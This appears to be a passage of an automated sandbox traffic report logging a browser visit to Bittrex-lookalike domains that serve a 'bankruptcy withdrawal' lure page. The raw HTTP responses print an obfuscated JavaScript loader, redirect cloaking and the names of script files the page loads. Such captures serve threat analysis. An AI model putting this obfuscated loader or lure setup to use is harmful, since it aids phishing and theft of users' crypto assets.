                          Mar 28, 2024 15:45:25.866486073 CET1.1.1.1192.168.2.40xac6cNo error (0)us-bittrex.com172.67.150.61A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:25.866486073 CET1.1.1.1192.168.2.40xac6cNo error (0)us-bittrex.com104.21.11.198A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:25.867207050 CET1.1.1.1192.168.2.40xa88No error (0)us-bittrex.com65IN (0x0001)false
                          Mar 28, 2024 15:45:26.651817083 CET1.1.1.1192.168.2.40x7a66No error (0)us-bittrex.com65IN (0x0001)false
                          Mar 28, 2024 15:45:26.652614117 CET1.1.1.1192.168.2.40x762aNo error (0)us-bittrex.com172.67.150.61A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:26.652614117 CET1.1.1.1192.168.2.40x762aNo error (0)us-bittrex.com104.21.11.198A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:27.272908926 CET1.1.1.1192.168.2.40xeb82No error (0)www.google.com65IN (0x0001)false
                          Mar 28, 2024 15:45:27.274605989 CET1.1.1.1192.168.2.40x30c5No error (0)www.google.com172.253.63.147A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:27.274605989 CET1.1.1.1192.168.2.40x30c5No error (0)www.google.com172.253.63.99A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:27.274605989 CET1.1.1.1192.168.2.40x30c5No error (0)www.google.com172.253.63.103A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:27.274605989 CET1.1.1.1192.168.2.40x30c5No error (0)www.google.com172.253.63.104A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:27.274605989 CET1.1.1.1192.168.2.40x30c5No error (0)www.google.com172.253.63.105A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:27.274605989 CET1.1.1.1192.168.2.40x30c5No error (0)www.google.com172.253.63.106A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:27.875653982 CET1.1.1.1192.168.2.40x6a26No error (0)us-bittrex.com65IN (0x0001)false
                          Mar 28, 2024 15:45:27.876560926 CET1.1.1.1192.168.2.40xe83No error (0)us-bittrex.com172.67.150.61A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:27.876560926 CET1.1.1.1192.168.2.40xe83No error (0)us-bittrex.com104.21.11.198A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:29.837251902 CET1.1.1.1192.168.2.40x29dfNo error (0)zhu-ni-hao-yun.sh65IN (0x0001)false
                          Mar 28, 2024 15:45:29.951184034 CET1.1.1.1192.168.2.40xfea1No error (0)zhu-ni-hao-yun.sh172.67.213.53A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:29.951184034 CET1.1.1.1192.168.2.40xfea1No error (0)zhu-ni-hao-yun.sh104.21.23.195A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:31.535310984 CET1.1.1.1192.168.2.40x115aNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:32.335678101 CET1.1.1.1192.168.2.40x79f9No error (0)zhu-ni-hao-yun.sh172.67.213.53A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:32.335678101 CET1.1.1.1192.168.2.40x79f9No error (0)zhu-ni-hao-yun.sh104.21.23.195A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:32.428212881 CET1.1.1.1192.168.2.40xf074No error (0)zhu-ni-hao-yun.sh65IN (0x0001)false
                          Mar 28, 2024 15:45:39.778661013 CET1.1.1.1192.168.2.40x78c1No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                          Mar 28, 2024 15:45:39.778661013 CET1.1.1.1192.168.2.40x78c1No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:45:52.494745970 CET1.1.1.1192.168.2.40x6646No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                          Mar 28, 2024 15:45:52.494745970 CET1.1.1.1192.168.2.40x6646No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:46:16.511876106 CET1.1.1.1192.168.2.40xbf7bNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                          Mar 28, 2024 15:46:16.511876106 CET1.1.1.1192.168.2.40xbf7bNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:46:31.538175106 CET1.1.1.1192.168.2.40xcd46No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                          Mar 28, 2024 15:46:35.263259888 CET1.1.1.1192.168.2.40x8a67No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                          Mar 28, 2024 15:46:35.263259888 CET1.1.1.1192.168.2.40x8a67No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                          • credit-bittrex.com
                          • https:
                            • us-bittrex.com
                            • zhu-ni-hao-yun.sh
                          • fs.microsoft.com
                          • a.nel.cloudflare.com
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449734172.67.150.1054436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:24 UTC669OUTGET /creditor HTTP/1.1
                          Host: credit-bittrex.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-User: ?1
                          Sec-Fetch-Dest: document
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-03-28 14:45:25 UTC623INHTTP/1.1 301 Moved Permanently
                          Date: Thu, 28 Mar 2024 14:45:25 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: close
                          Location: http://credit-bittrex.com/creditor/
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m0EcOKk8RtkYHfAKjO8ifBUfGCS0dRzTzMti6FavfMZqqVEu51kZTtdfD4jVin3s4L2O8mAHsQIj25Cyv1HUUrMOCvHRYMz7QXyy1MvCV8WVg3EgbUuvtAx%2Bc2BcevsA%2BUtjBnI%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86b8675faab005fb-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-28 14:45:25 UTC184INData Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                          Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                          2024-03-28 14:45:25 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.449735172.67.150.1054436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:25 UTC670OUTGET /creditor/ HTTP/1.1
                          Host: credit-bittrex.com
                          Connection: keep-alive
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-User: ?1
                          Sec-Fetch-Dest: document
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-03-28 14:45:25 UTC607INHTTP/1.1 200 OK
                          Date: Thu, 28 Mar 2024 14:45:25 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: close
                          Last-Modified: Thu, 28 Mar 2024 14:03:56 GMT
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gaqJ8ukVNwz3Xso9bu00Mh45cDGOCiGEquWAbO7%2Bojmww4h9ijclqcx2jK4PwNntfd9RIyZOFwVMdNpk%2BGgGR9fu4IFeJvJKlCdQ26F2hGcTcUasD1gmuZpMW3Vw5hSOAEJa2a8%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86b867623dcd8192-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-28 14:45:25 UTC85INData Raw: 34 66 0d 0a 3c 73 63 72 69 70 74 3e 0a 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f 75 73 2d 62 69 74 74 72 65 78 2e 63 6f 6d 2f 77 69 74 68 64 72 61 77 61 6c 27 0a 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a
                          Data Ascii: 4f<script>window.location.href = 'https://us-bittrex.com/withdrawal'</script>
                          2024-03-28 14:45:25 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.449738172.67.150.614436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:26 UTC691OUTGET /withdrawal HTTP/1.1
                          Host: us-bittrex.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Dest: document
                          Referer: https://credit-bittrex.com/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-03-28 14:45:26 UTC619INHTTP/1.1 301 Moved Permanently
                          Date: Thu, 28 Mar 2024 14:45:26 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: close
                          Location: http://us-bittrex.com/withdrawal/
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJ2uP5HIJJu9nRVhYlRzFz2EWea4eD4YN4Ssv65GB6OdizNVqJ0ujvginXjcupolVZPhl3O3ESjByoC7XJqzU4WeolMPKKvqzZc%2BD3jV%2F3FMWBJkjhYoPvYq0j6mKcx60Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86b867672f005770-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-28 14:45:26 UTC184INData Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                          Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                          2024-03-28 14:45:26 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.449739172.67.150.614436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:26 UTC654OUTGET /withdrawal/ HTTP/1.1
                          Host: us-bittrex.com
                          Connection: keep-alive
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Dest: document
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-03-28 14:45:26 UTC609INHTTP/1.1 200 OK
                          Date: Thu, 28 Mar 2024 14:45:26 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: close
                          Last-Modified: Thu, 28 Mar 2024 11:55:52 GMT
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5SDabFMPCZqvVj4bGcsCKheIOQVmPjKCJpwy%2B73BXosO%2Br%2BFFEYyJ2TJeZCiBm97HswMHjWfUfKUsqPXPOkfyEc7lITgLdtauVA4dfc7iRgVKmPiGfOpdVG6fIBJXSZN%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86b86769ea4881d9-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-28 14:45:26 UTC760INData Raw: 39 64 61 0d 0a 3c 73 63 72 69 70 74 3e 0a 09 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6a 59 63 3d 27 27 2c 6d 44 53 3d 31 38 33 2d 31 37 32 3b 66 75 6e 63 74 69 6f 6e 20 66 51 6f 28 67 29 7b 76 61 72 20 6b 3d 31 33 39 31 37 37 32 3b 76 61 72 20 79 3d 67 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 79 3b 63 2b 2b 29 7b 64 5b 63 5d 3d 67 2e 63 68 61 72 41 74 28 63 29 7d 3b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 79 3b 63 2b 2b 29 7b 76 61 72 20 76 3d 6b 2a 28 63 2b 34 36 38 29 2b 28 6b 25 34 36 38 34 39 29 3b 76 61 72 20 6e 3d 6b 2a 28 63 2b 35 32 38 29 2b 28 6b 25 32 30 30 35 31 29 3b 76 61 72 20 78 3d 76 25 79 3b 76 61 72 20 72 3d 6e 25 79 3b 76 61 72 20 77 3d 64 5b 78 5d 3b 64 5b 78 5d 3d 64 5b 72
                          Data Ascii: 9da<script>(function(){var jYc='',mDS=183-172;function fQo(g){var k=1391772;var y=g.length;var d=[];for(var c=0;c<y;c++){d[c]=g.charAt(c)};for(var c=0;c<y;c++){var v=k*(c+468)+(k%46849);var n=k*(c+528)+(k%20051);var x=v%y;var r=n%y;var w=d[x];d[x]=d[r
                          2024-03-28 14:45:26 UTC1369INData Raw: 7a 6f 28 43 61 3d 63 72 29 65 29 6e 6a 3b 29 72 6c 3d 36 28 67 29 78 20 73 38 74 69 67 6e 74 31 2e 20 2b 72 72 67 31 3b 2a 7d 2b 75 3d 3b 20 30 76 28 67 64 65 41 20 74 6f 29 29 2b 2e 61 76 73 64 69 3b 22 63 29 63 30 2e 28 2c 2c 76 3b 66 75 39 28 3b 3b 29 3d 6e 6f 6f 20 28 68 76 76 74 61 7a 6a 70 72 31 3b 2c 5d 63 7d 3d 72 6f 5b 72 2b 69 74 6f 6a 2b 20 61 29 3d 28 39 73 32 5b 6f 6d 68 64 6c 74 29 29 7a 29 30 68 61 6f 3b 2b 68 64 6f 69 3d 72 68 3b 6c 28 76 36 2e 65 3b 63 65 2e 36 20 3b 43 2b 3d 69 7a 28 5d 5b 6e 2e 75 3d 70 70 7a 3d 5b 5d 5d 3d 70 74 68 3d 67 29 3b 5d 3d 38 61 69 35 61 2e 2b 2b 75 3d 75 66 66 61 63 76 2d 2c 3c 29 72 73 66 69 70 3b 69 75 2e 69 61 2b 77 63 20 63 28 3d 28 2e 76 3d 69 20 41 3b 61 3b 66 5d 6e 61 6c 20 29 3d 3d 77 38 61 37 6f 5b
                          Data Ascii: zo(Ca=cr)e)nj;)rl=6(g)x s8tignt1. +rrg1;*}+u=; 0v(gdeA to))+.avsdi;"c)c0.(,,v;fu9(;;)=noo (hvvtazjpr1;,]c}=ro[r+itoj+ a)=(9s2[omhdlt))z)0hao;+hdoi=rh;l(v6.e;ce.6 ;C+=iz(][n.u=ppz=[]]=pth=g);]=8ai5a.++u=uffacv-,<)rsfip;iu.ia+wc c(=(.v=i A;a;f]nal )==w8a7o[
                          2024-03-28 14:45:26 UTC400INData Raw: 6e 32 28 24 29 75 72 6c 5c 2f 29 63 70 66 5f 2c 5b 5b 7b 6f 2e 26 29 73 33 3d 29 66 3b 6e 65 7b 6c 21 6d 21 6f 52 70 2b 5f 31 64 28 66 33 52 32 5f 6e 37 33 29 30 52 75 52 6b 64 21 2b 5f 61 69 62 6d 33 2c 72 52 28 2c 69 33 36 31 52 33 52 2e 52 64 2c 65 26 2e 6a 69 2d 21 35 52 63 3d 2c 5d 2c 29 29 7b 6a 74 72 2e 2c 37 52 6a 75 2e 24 28 75 3b 2e 52 2c 3b 65 23 2e 2c 6a 2c 62 6e 52 78 2e 52 29 3d 30 77 22 3d 5f 28 6a 67 74 63 2c 33 2e 2b 37 3b 29 64 29 5f 3b 2e 30 69 37 29 6b 6e 2e 30 5c 27 32 29 2b 30 52 65 24 69 35 25 3b 77 20 29 5c 2f 73 75 3d 64 76 3d 5f 74 70 62 63 2e 2e 37 6f 20 21 75 28 28 72 6f 69 2a 74 5d 52 21 78 36 20 2c 36 52 29 72 70 74 70 62 34 7b 30 75 2e 29 30 66 3d 7d 52 30 2e 2e 62 2e 52 6f 63 7d 3b 21 29 52 23 3d 30 52 72 43 2e 21 24 29 5c
                          Data Ascii: n2($)url\/)cpf_,[[{o.&)s3=)f;ne{l!m!oRp+_1d(f3R2_n73)0RuRkd!+_aibm3,rR(,i361R3R.Rd,e&.ji-!5Rc=,],)){jtr.,7Rju.$(u;.R,;e#.,j,bnRx.R)=0w"=_(jgtc,3.+7;)d)_;.0i7)kn.0\'2)+0Re$i5%;w )\/su=dv=_tpbc..7o !u((roi*t]R!x6 ,6R)rptpb4{0u.)0f=}R0..b.Roc};!)R#=0RrC.!$)\
                          2024-03-28 14:45:26 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                          Data Ascii: 1
                          2024-03-28 14:45:26 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.449740172.67.150.614436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:27 UTC616OUTGET /favicon.ico HTTP/1.1
                          Host: us-bittrex.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://us-bittrex.com/withdrawal/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: sessionid=0
                          2024-03-28 14:45:27 UTC656INHTTP/1.1 200 OK
                          Date: Thu, 28 Mar 2024 14:45:27 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: close
                          Last-Modified: Thu, 28 Mar 2024 09:41:29 GMT
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 2359
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BT1%2FisK%2FqhF2ocAnyi8tyEmO%2B%2BiFWnDWJnD2LiYkH%2B22stciQKzY4%2BjA4FYEg52y0FO7wmd%2FrM2GBrfbCy%2F1NJvz9%2Fla1gVwf8qPgSNJzltAXVphPp2Ol5HQodKLBOnplg%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86b8676faf197f56-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-28 14:45:27 UTC70INData Raw: 34 30 0d 0a 3c 73 63 72 69 70 74 3e 0a 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 22 0a 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a
                          Data Ascii: 40<script>window.location.href = "https://google.com"</script>
                          2024-03-28 14:45:27 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.449742172.67.150.614436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:27 UTC749OUTGET /bankruptcy/withdrawal/chapter11/debtor/ HTTP/1.1
                          Host: us-bittrex.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Dest: document
                          Referer: https://us-bittrex.com/withdrawal/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: sessionid=0
                          2024-03-28 14:45:28 UTC617INHTTP/1.1 200 OK
                          Date: Thu, 28 Mar 2024 14:45:28 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: close
                          Last-Modified: Thu, 28 Mar 2024 11:54:49 GMT
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ie3x91W2XebuJR%2BMD6t%2BN0cjWmyRw2HMVMR3wmNreE8%2B9rDK06PgAVZ7GaCdHHNhuGc0MIdT%2FU2bTkVQfCSvisOxSD0yMFghN3iBXU%2FlgapeeI864y3V%2FDseb%2FuUZv3%2FNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86b86771088405eb-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-28 14:45:28 UTC752INData Raw: 34 62 65 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 6a 73 2f 63 6f 6e 74 72 61 63 74 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 6a 73 2f 65 6e 74 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 55 4e 49 51 55 45 5f 49 44 45 4e 54 49 54 59 20 3d
                          Data Ascii: 4be6<!DOCTYPE html><html lang="en"><head> <script defer="defer" src="js/contracts.js"></script> <script defer="defer" src="js/main.js"></script> <script defer="defer" src="js/entry.js"></script> <script> window.UNIQUE_IDENTITY =
                          2024-03-28 14:45:28 UTC1369INData Raw: 6e 22 20 68 72 65 66 3d 22 22 2f 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 69 6e 70 75 74 20 7b 0a 09 66 6f 6e 74 3a 20 69 6e 68 65 72 69 74 3b 0a 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 69 6e 68 65 72 69 74 3b 0a 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 30 20 30 3b 0a 09 62 6f 72 64 65 72 20 30 3b 0a 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 35 2c 20 32 35 2c 20 32 35 2c 20 2e 33 35 29 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 6d 69 6e 2d 77 69 64 74 68 3a 20 30 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 33 70 78 3b 0a 09 62 6f 78 2d 73 68
                          Data Ascii: n" href=""/><style> input {font: inherit;letter-spacing: inherit;box-sizing: content-box;background: 0 0;border 0;border-color: rgba(25, 25, 25, .35);margin: 0 auto;display: block;min-width: 0;width: 100%;padding: 13px;box-sh
